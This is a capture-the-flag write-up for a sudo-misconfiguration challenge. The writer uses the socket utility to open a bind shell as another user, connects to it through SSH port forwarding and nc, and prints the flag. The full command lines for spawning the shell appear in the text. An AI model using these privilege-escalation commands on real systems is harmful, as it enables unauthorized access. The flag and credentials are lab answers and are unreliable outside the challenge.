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Category: System


This is a warmup to get you going. Your task is to read /home/privilegeduser/flag.txt. For our new commers, the title might steer you in the right direction ;). Good luck!

Credentials: user:password123

> Deploy on

Format : Hero{flag}

Author : Log_s


  • Upon accessing the remote server using SSH (ssh [email protected] -p 10287), we attempted to view the permissions of the directory /home/privilegeduser/ and the flag file /home/privilegeduser/flag.txt. Unfortunately, we encountered insufficient permissions and couldn't access them.
  • Considering the challenge's name suggested the use of the sudo utility, we decided to check our current user's privileges using the sudo -l command.
    Text Only
    Matching Defaults entries for user on sudoklu:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
    User user may run the following commands on sudoklu:
        (privilegeduser) NOPASSWD: /usr/bin/socket
  • It appeared that our user could execute the socket utility as privilegeduser through sudo without requiring a password.
  • Referring to GTFOBins, we discovered that we could create a bind shell using the socket command. This meant we could create a bind shell by utilizing privilegeduser with sudo without requiring password.
  • The command to create the listener that would spawn a shell is: sudo -u privilegeduser /usr/bin/socket -svp '/bin/sh -i' 13337.
  • We opened a second terminal to forward local traffic from port 12345 to the server's port 13337 using the command: ssh -L 12345: [email protected] -p 10287.
  • With the local port forwarding established, we could interact with the server's port 13337 through our local port 12345 by opening a third terminal and running: nc localhost 12345.
  • By executing these steps, we successfully created a bind shell and established a connection to it. We obtained the flag within the bind shell.

Flag: Hero{ch3ck_f0r_m1sc0nf1gur4t1on5}